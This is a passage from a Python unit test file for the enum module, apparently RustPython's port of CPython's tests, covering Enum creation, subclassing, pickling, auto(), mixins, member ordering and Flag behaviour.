e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
class StrEnum(str, Enum):
def __new__(cls, *args, **kwargs):
for a in args:
if not isinstance(a, str):
raise TypeError("Enumeration '%s' (%s) is not"
" a string" % (a, type(a).__name__))
return str.__new__(cls, *args, **kwargs)
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
